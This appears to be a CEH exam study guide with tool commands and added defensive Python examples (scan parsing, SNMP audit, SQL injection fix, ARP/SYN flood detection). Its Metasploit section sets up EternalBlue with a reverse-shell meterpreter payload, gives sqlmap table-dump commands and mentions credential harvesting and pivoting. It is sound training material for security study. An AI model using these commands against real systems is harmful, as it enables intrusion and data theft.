How to Pass the CEH (Certified Ethical Hacker) Exam
Master ethical hacking with real CLI tools and proven exam strategies.
The CEH (Certified Ethical Hacker) exam from EC-Council validates your ability to think like a hacker and identify vulnerabilities before malicious actors do. With 125 multiple-choice questions, a 4-hour time limit, and a passing score of 70%, this exam demands both theoretical knowledge and hands-on proficiency. You'll need to master tools like Nmap, Metasploit, Wireshark, and SQLmap, as well as understand footprinting, scanning, enumeration, system hacking, and social engineering. This guide provides a step-by-step study plan, real CLI commands, and insider tips to help you pass on your first attempt.
Understand the Exam Blueprint and Domains
Start by downloading the official CEH exam blueprint from EC-Council. The exam covers 20 domains, including footprinting (17%), scanning networks (17%), enumeration (14%), system hacking (14%), and malware threats (7%). Focus on high-weight domains first. The exam has 125 questions, and you need 70% to pass. Use the blueprint to create a study schedule that allocates more time to domains with higher percentages.
EC-Council CEH Exam Blueprint (v12)
Domain 1: Footprinting & Reconnaissance - 17%
Domain 2: Scanning Networks - 17%
Domain 3: Enumeration - 14%
Domain 4: System Hacking - 14%
Domain 5: Malware Threats - 7%
...
Total Questions: 125
Passing Score: 70%
Print the blueprint and check off each domain as you master it. Use a progress tracker to stay motivated.
Don't skip low-weight domains like IoT hacking (3%) — they can still cost you points.
Master Reconnaissance with Nmap and Recon-ng
Footprinting is the first phase of ethical hacking. Practice using Nmap for network scanning and Recon-ng for automated reconnaissance. Learn to identify open ports and running services, and to fingerprint the operating system. Use Nmap scripts to detect known vulnerabilities. For example, run a SYN scan with service version detection and OS detection. Understand the difference between active reconnaissance (you send packets to the target) and passive reconnaissance (you only consult public sources).
nmap -sS -sV -O -T4 -p- 192.168.1.0/24
# SYN scan, version detection, OS detection, all ports
recon-ng
[recon-ng][default] > use recon/domains-hosts/google_site_web
[recon-ng][default] > set SOURCE example.com
[recon-ng][default] > run
Use the Nmap scripting engine (NSE) for vulnerability detection: nmap --script vuln <target>
Always get written permission before scanning any network you don't own.
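A scan is only useful once its results are read. The following added example (not part of this guide, and not Nmap's own code) parses the grepable output that the scan above writes when run with -oG scan.gnmap, turns it into a per-host inventory, and flags confirmed-open services that violate a baseline. The sample output and the baseline of "unexpected" ports are constructed for the example.

```python
"""Turn Nmap grepable output (-oG) into a host/service inventory.

Added example, not from the original guide or from Nmap: the scan above,
run with `-oG scan.gnmap`, writes one tab-separated line per host. Parsing
it is how a defender converts a scan into an asset list and spots services
that should not be reachable. SAMPLE_GNMAP is constructed sample output.
"""
import re
from typing import Dict, List

# Constructed sample in Nmap's -oG layout; each port entry is
# port/state/proto/owner/service/rpcinfo/version/ (owner and rpcinfo are
# empty in practice, which is why the pattern below assumes "//" there).
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated as: nmap -sS -sV -O -T4 -p- -oG scan.gnmap 192.168.1.0/24\n"
    "Host: 192.168.1.10 ()\tStatus: Up\n"
    "Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, "
    "80/open/tcp//http//Apache httpd 2.4.52/, 445/open/tcp//microsoft-ds?///"
    "\tIgnored State: closed (65532)\tOS: Linux 5.X\n"
    "Host: 192.168.1.20 ()\tPorts: 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/, "
    "161/open|filtered/udp//snmp///\tIgnored State: filtered (65534)\n"
    "# Nmap done -- 256 IP addresses (2 hosts up) scanned in 300.00 seconds\n"
)

PORT_RE = re.compile(r"(\d+)/([^/]+)/([^/]+)//([^/]*)//([^/]*)/")


def parse_gnmap(text: str) -> Dict[str, List[dict]]:
    """Return {ip: [{port, state, proto, service, version}, ...]}."""
    hosts: Dict[str, List[dict]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # skip the "# Nmap ..." header and footer lines
        fields = line.split("\t")
        ip = fields[0].split()[1]
        hosts.setdefault(ip, [])  # a "Status: Up" line may precede the Ports line
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for m in PORT_RE.finditer(field):
                port, state, proto, service, version = m.groups()
                hosts[ip].append({
                    "port": int(port), "state": state, "proto": proto,
                    "service": service, "version": version,
                })
    return hosts


# Services a host on this LAN is not expected to expose (an assumption made
# for the example; a real baseline comes from your asset policy).
UNEXPECTED = {445: "SMB reachable", 3389: "RDP reachable", 161: "SNMP reachable"}


def flag_unexpected(hosts: Dict[str, List[dict]]) -> List[str]:
    """List only confirmed-open ports that violate the baseline above."""
    findings = []
    for ip, ports in hosts.items():
        for p in ports:
            if p["state"] == "open" and p["port"] in UNEXPECTED:
                detail = f"{p['service']} {p['version']}".strip()
                findings.append(f"{ip}:{p['port']}/{p['proto']} {UNEXPECTED[p['port']]} ({detail})")
    return findings


if __name__ == "__main__":
    inventory = parse_gnmap(SAMPLE_GNMAP)
    for ip, ports in inventory.items():
        print(ip, [f"{p['port']}/{p['proto']} {p['state']}" for p in ports])
    for finding in flag_unexpected(inventory):
        print("FINDING:", finding)
```

Note that the 161/udp entry is reported as open|filtered, not open, so it is not flagged: UDP scans rarely give a definite answer, which is the kind of nuance exam questions on scanning like to test.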
Perform Enumeration with NetBIOS, SNMP, and LDAP
Enumeration extracts user lists, shares, and services from target systems. Use tools like enum4linux for NetBIOS/SMB enumeration, snmpwalk for SNMP, and ldapsearch for Active Directory. Practice extracting usernames, group memberships, and system policies. This phase is critical for identifying attack vectors.
enum4linux -a 192.168.1.10
# Enumerate users, shares, OS info via SMB
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.1
# Enumerate system information via SNMP
ldapsearch -x -H ldap://192.168.1.10 -b "dc=example,dc=com"
# Enumerate LDAP directory
Use the -a flag with enum4linux to get all available information in one go.
SNMP community strings like 'public' are often left default — this is a common exam scenario.
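The snmpwalk command above only works because the agent still accepts a v1/v2c community string. The added example below (not part of this guide, and not Net-SNMP's code) audits an snmpd.conf for exactly that, showing the weak configuration next to a hardened SNMPv3 one. Both configuration texts are constructed samples; the directive names (rocommunity, rwcommunity, com2sec, createUser, rouser, agentAddress) are standard Net-SNMP syntax, and the passphrases are placeholders.

```python
"""Audit an snmpd.conf for the default-community problem described above.

Added example, not from the original guide or from Net-SNMP. The two
configurations are constructed samples.
"""
from typing import List, Tuple

# Constructed weak config: v2c communities, the default "public" with no
# source restriction, and a read-write community as well.
WEAK_SNMPD_CONF = """\
agentAddress udp:161
rocommunity public
rwcommunity private 192.168.1.0/24
com2sec readonly default public
"""

# Constructed hardened config: SNMPv3 only, authentication and encryption
# required ("priv"), agent bound to specific addresses. Passphrases are placeholders.
HARDENED_SNMPD_CONF = """\
agentAddress udp:127.0.0.1:161,udp:192.168.1.10:161
createUser monitor SHA "REPLACE_WITH_AUTH_PASSPHRASE" AES "REPLACE_WITH_PRIV_PASSPHRASE"
rouser monitor priv
"""

DEFAULT_COMMUNITIES = {"public", "private"}


def audit_snmpd_conf(text: str) -> List[Tuple[int, str]]:
    """Return (line number, finding) pairs; an empty list means nothing was flagged."""
    findings: List[Tuple[int, str]] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive in ("rocommunity", "rwcommunity") and len(parts) >= 2:
            community = parts[1]
            restricted = len(parts) >= 3  # optional SOURCE argument present
        elif directive == "com2sec" and len(parts) >= 4:
            community = parts[3]  # com2sec NAME SOURCE COMMUNITY
            restricted = parts[2] != "default"
        else:
            continue  # createUser, rouser, agentAddress etc. are not community directives
        findings.append((lineno, f"SNMP v1/v2c community '{community}': sent in cleartext, no authentication"))
        if community.lower() in DEFAULT_COMMUNITIES:
            findings.append((lineno, f"default community string '{community}' (what 'snmpwalk -c public' relies on)"))
        if directive == "rwcommunity":
            findings.append((lineno, "write access granted via a community string"))
        if not restricted:
            findings.append((lineno, "no source restriction: any host can query the agent"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SNMPD_CONF), ("hardened", HARDENED_SNMPD_CONF)):
        print(f"== {label} ==")
        for lineno, msg in audit_snmpd_conf(conf) or [(0, "no findings")]:
            print(f"  line {lineno}: {msg}")
```

The same check is worth running on any device you are responsible for before someone else runs snmpwalk against it.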
Exploit Vulnerabilities with Metasploit and SQLmap
System hacking involves gaining access. Use Metasploit to exploit known vulnerabilities and SQLmap to automate SQL injection attacks. Practice setting up a listener, selecting an exploit, and configuring payloads. For example, exploit EternalBlue on a Windows target or use SQLmap to dump a database. Understand how to escalate privileges and maintain access.
msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.10
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.100
msf6 > exploit
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump
Use Metasploit's post-exploitation modules to gather credentials and pivot to other systems.
Metasploit exploits can crash services — test in a lab environment first.
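The exam also expects you to explain why the page?id=1 endpoint above is injectable and how it should have been written. The following added example (not part of this guide, and not SQLmap's code) puts the vulnerable lookup next to the hardened one over an in-memory SQLite table with constructed rows, so you can watch a tautology in the id parameter return the whole table in one case and be rejected in the other.

```python
"""The injection SQLmap automates, and the fix, side by side.

Added example, not from the original guide: a small in-memory SQLite table
stands in for the `page?id=1` endpoint the sqlmap commands above target.
The rows are constructed sample data.
"""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample data: the kind of table sqlmap's --dump would reveal."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (id, username, email) VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.com"), (2, "bob", "bob@example.com")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """The bug: the request parameter is spliced into the SQL text, so the
    database cannot tell data from query. Shown only to contrast with the fix."""
    query = f"SELECT id, username, email FROM users WHERE id = {user_id}"
    return conn.execute(query).fetchall()


def lookup_hardened(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """The fix: validate the parameter's type, then bind it with a placeholder
    so the value is always treated as a literal, never as SQL."""
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT id, username, email FROM users WHERE id = ?", (int(user_id),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "1 OR 1=1"  # the tautology a scanner tries first to confirm injection
    print("vulnerable, id=1      :", lookup_vulnerable(db, "1"))
    print("vulnerable, tautology :", lookup_vulnerable(db, probe))  # whole table
    print("hardened,   id=1      :", lookup_hardened(db, "1"))
    try:
        lookup_hardened(db, probe)
    except ValueError as exc:
        print("hardened,   tautology :", exc)
```

Parameter binding is the fix; input validation is defence in depth on top of it, not a substitute. Either change alone would have been enough to make the --dbs and --dump commands above fail against this endpoint, which is the point the exam wants you to be able to argue.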
Analyze Traffic with Wireshark and Tcpdump
Packet analysis is essential for detecting attacks and understanding network protocols. Use Wireshark to capture and filter traffic. Practice identifying ARP spoofing, SYN floods, and DNS queries. Use tcpdump for command-line packet capture. Learn to filter by IP, port, and protocol. Understand how to extract files from packet captures.
tcpdump -i eth0 -n -s 0 -w capture.pcap
# Capture all traffic on eth0
tcpdump -r capture.pcap 'tcp port 80'
# Filter HTTP traffic
Wireshark filter: http.request or tcp.port == 443
# Show HTTP requests and HTTPS traffic
Use Wireshark's 'Follow TCP Stream' feature to reconstruct conversations and extract data.
Large packet captures can consume memory — use capture filters to limit scope.
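Two of the patterns the section tells you to practise spotting, ARP spoofing and SYN floods, can be detected from the one-line-per-packet text that tcpdump -n -r capture.pcap prints, without a pcap library. The added example below (not part of this guide, and not tcpdump's or Wireshark's code) does that over constructed sample lines: a gateway IP answered by two different MACs, one legitimate three-way handshake, and sixty SYNs that are never completed. The addresses are documentation ranges and the thresholds are assumptions for the example.

```python
"""Detect ARP spoofing and SYN floods in tcpdump text output.

Added example, not from the original guide. It reads the text that
`tcpdump -n -r capture.pcap` prints, one packet per line, and applies two
of the detections the guide says to practise. SAMPLE_LINES is constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

ARP_RE = re.compile(r"ARP, Reply (\S+) is-at ([0-9a-f:]{17})")
TCP_RE = re.compile(
    r"IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([^\]]+)\]"
)

# Constructed sample traffic: a gateway IP answered by two different MACs
# (ARP spoofing), one legitimate handshake from 10.0.0.5, then 60 SYNs to
# port 80 from different sources that are never followed by an ACK.
SAMPLE_LINES: List[str] = [
    "12:00:00.000001 ARP, Reply 192.168.1.1 is-at aa:bb:cc:dd:ee:01, length 28",
    "12:00:00.500000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28",
    "12:00:01.000000 IP 10.0.0.5.40001 > 192.168.1.10.80: Flags [S], seq 1, win 64240, length 0",
    "12:00:01.000100 IP 192.168.1.10.80 > 10.0.0.5.40001: Flags [S.], seq 100, ack 2, win 65535, length 0",
    "12:00:01.000200 IP 10.0.0.5.40001 > 192.168.1.10.80: Flags [.], ack 101, win 64240, length 0",
] + [
    f"12:00:02.{i:06d} IP 203.0.113.{i + 1}.{50000 + i} > 192.168.1.10.80: Flags [S], seq 0, win 1024, length 0"
    for i in range(60)
]


def detect_arp_spoofing(lines: List[str]) -> Dict[str, Set[str]]:
    """IPs that were claimed by more than one MAC within the capture."""
    claims: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        m = ARP_RE.search(line)
        if m:
            claims[m.group(1)].add(m.group(2))
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


def detect_syn_flood(lines: List[str], threshold: int = 50) -> Dict[str, int]:
    """Count half-open connections per destination: a client SYN that is never
    followed by that client's handshake-completing ACK. Destinations at or
    over `threshold` are returned as {"ip:port": count}."""
    half_open: Set[Tuple[str, str, str, str]] = set()
    for line in lines:
        m = TCP_RE.search(line)
        if not m:
            continue
        src, sport, dst, dport, flags = m.groups()
        flow = (src, sport, dst, dport)
        if flags == "S":  # pure SYN from the client ("S." is the server's SYN-ACK)
            half_open.add(flow)
        elif flags == "." and flow in half_open:  # client's final ACK completes it
            half_open.discard(flow)
    counts: Dict[str, int] = defaultdict(int)
    for _, _, dst, dport in half_open:
        counts[f"{dst}:{dport}"] += 1
    return {k: v for k, v in counts.items() if v >= threshold}


if __name__ == "__main__":
    print("ARP spoofing candidates:", detect_arp_spoofing(SAMPLE_LINES))
    print("SYN flood candidates:", detect_syn_flood(SAMPLE_LINES))
```

The equivalent Wireshark display filters are arp.opcode == 2 (then sort by the sender IP to spot duplicates) and tcp.flags.syn == 1 && tcp.flags.ack == 0; the script simply automates the same two checks over a large capture.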
Practice Social Engineering and Password Cracking
Social engineering is a key exam domain. Learn techniques like phishing, pretexting, and tailgating. For password cracking, use tools like John the Ripper and Hashcat. Practice cracking NTLM hashes and Linux shadow files. Understand password policies and how to create wordlists with Crunch.
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Crack NTLM hashes
hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# Hashcat mode 1000 = NTLM
crunch 8 8 abcdef123 -o wordlist.txt
# Generate 8-character wordlist with custom charset
Use the rockyou.txt wordlist — it's included in Kali Linux and contains millions of real passwords.
Password cracking can be time-consuming — focus on weak passwords and common patterns.
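The crunch command above generates 9^8 candidates, and the exam expects you to reason about keyspace size versus cracking speed when you judge a password policy. The added example below (not part of this guide, and not Crunch's or Hashcat's code) computes the size of a Crunch wordlist before you generate it, converts that to a worst-case time at a given guess rate, and screens a candidate password against the wordlist and the digit-suffix mangling that crackers try first. The tiny wordlist and the guess rate are constructed illustrations; with a real list you would pass the lines of rockyou.txt.

```python
"""Size a Crunch wordlist before generating it, and screen a password
against the wordlist and patterns the section above says crackers try first.

Added example, not from the original guide or from Crunch/Hashcat. The
wordlist and the guess rate used at the bottom are constructed illustrations.
"""
from typing import Iterable, List


def crunch_keyspace(min_len: int, max_len: int, charset: str) -> int:
    """Number of candidates `crunch MIN MAX CHARSET` writes: sum of |charset|^n."""
    if min_len < 1 or max_len < min_len or not charset:
        raise ValueError("need 1 <= min_len <= max_len and a non-empty charset")
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def crack_seconds(keyspace: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given rate."""
    return keyspace / guesses_per_second


def password_findings(password: str, wordlist: Iterable[str], min_length: int = 12) -> List[str]:
    """Reasons a password would fall quickly to a wordlist attack; empty list means none found."""
    findings: List[str] = []
    lowered = password.lower()
    words = {w.strip().lower() for w in wordlist}
    if lowered in words:
        findings.append("appears verbatim in the wordlist")
    # Strip trailing digits/symbols: "letmein2024!" is "letmein" plus a standard mangling rule.
    stripped = lowered.rstrip("0123456789!@#$%")
    if stripped != lowered and stripped in words:
        findings.append("wordlist entry with digits/symbols appended (a standard mangling rule)")
    if len(password) < min_length:
        findings.append(f"shorter than {min_length} characters")
    classes = sum(
        any(test(c) for c in password)
        for test in (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum())
    )
    if classes < 3:
        findings.append("uses fewer than three character classes")
    return findings


if __name__ == "__main__":
    space = crunch_keyspace(8, 8, "abcdef123")          # the crunch command above
    print(f"crunch 8 8 abcdef123 -> {space:,} candidates")
    print(f"at 1e9 guesses/s (illustrative GPU rate): {crack_seconds(space, 1e9):.3f} s worst case")
    sample_wordlist = ["123456", "password", "letmein"]  # constructed stand-in for rockyou.txt
    for pw in ("Password", "letmein2024!", "correct horse battery staple 9Q!"):
        print(repr(pw), "->", password_findings(pw, sample_wordlist) or ["no findings"])
```

The takeaway the exam wants is the arithmetic: a full 8-character list over a 9-symbol charset is tried in well under a minute on commodity hardware, so length and unpredictability, not complexity rules alone, are what a password policy must enforce.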
Take Practice Exams and Review Weak Areas
After studying all domains, take full-length practice exams from reputable sources like Boson or EC-Council's official practice tests. Simulate the 4-hour time limit. Review every question you got wrong and understand the reasoning. Focus on areas where you score below 80%. Repeat until you consistently score 85% or higher.
Practice Exam Results:
Domain 1: 85%
Domain 2: 78% <- Weak area, review scanning techniques
Domain 3: 90%
Domain 4: 72% <- Weak area, review privilege escalation
Domain 5: 88%
Overall: 82%
Use the 'exam mode' in practice tests to build stamina and time management skills.
Don't memorize answers — understand the concepts. EC-Council changes questions frequently.
Key tips
Set up a home lab with VirtualBox or VMware. Install Kali Linux, Metasploitable, and Windows VMs to practice attacks in a safe environment.
Join the CEH subreddit and Discord communities. Discussing concepts with peers reinforces learning and exposes you to real-world scenarios.
Use flashcards for port numbers, tool commands, and attack types. Apps like Anki are great for spaced repetition.
Focus on the 'why' behind each attack. The exam tests your understanding of methodology, not just tool usage.
Take breaks during study sessions. The Pomodoro technique (25 min study, 5 min break) improves retention.
Book your exam date before you start studying. A deadline creates urgency and prevents procrastination.
Frequently asked questions
How many questions are on the CEH exam and what is the passing score?
The CEH exam has 125 multiple-choice questions. You have 4 hours to complete it, and the passing score is 70%. Some questions may be unscored (beta questions), but you won't know which ones. Aim for 85% on practice tests to be safe.
Do I need to take an official EC-Council training course to sit for the exam?
EC-Council requires either official training (through an accredited partner) or at least 2 years of information security experience. If you have the experience, you can apply for the exam without training. Otherwise, you must complete a 5-day official CEH course.
What tools should I be proficient in for the CEH exam?
You should be comfortable with Nmap, Wireshark, Metasploit, SQLmap, John the Ripper, Hashcat, Burp Suite, and Recon-ng. The exam tests both theoretical knowledge and practical usage. Practice each tool in a lab environment until you can use them without referring to documentation.
How long does it take to prepare for the CEH exam?
Most candidates need 2-3 months of consistent study, dedicating 10-15 hours per week. If you have prior networking or security experience, you may need less time. Focus on hands-on labs and practice exams rather than just reading books.
Is the CEH exam worth it for my career?
Yes, especially if you're pursuing a career in penetration testing, security analysis, or red teaming. CEH is recognized by the DoD (8570 directive) and many employers. It demonstrates a structured understanding of ethical hacking methodology. However, consider pairing it with OSCP for advanced roles.
Related glossary terms
Passive reconnaissance
Passive reconnaissance is the process of gathering information about a target system or network without directly interacting with it, using publicly available sources and stealthy observation.
OSINT Techniques
OSINT techniques are methods used to collect information from publicly available sources for security assessments or investigations.
Zero Day Vulnerabilities
A zero day vulnerability is a security flaw in software or hardware that the vendor does not yet know about and has not fixed, making it extremely dangerous because attackers can exploit it before a patch exists.
Steganography
Steganography is the practice of hiding a secret message inside an ordinary, non-secret file such as an image, audio, or video to keep the message hidden from casual observers.
Session Hijacking
Session hijacking is an attack where a cybercriminal steals or takes over a user's active session with a web application, allowing the attacker to pretend to be that user without needing their password.
Exploit Databases
An exploit database is a curated collection of known software vulnerabilities, proof-of-concept exploit code, and security research findings used by ethical hackers and security professionals to test and defend systems.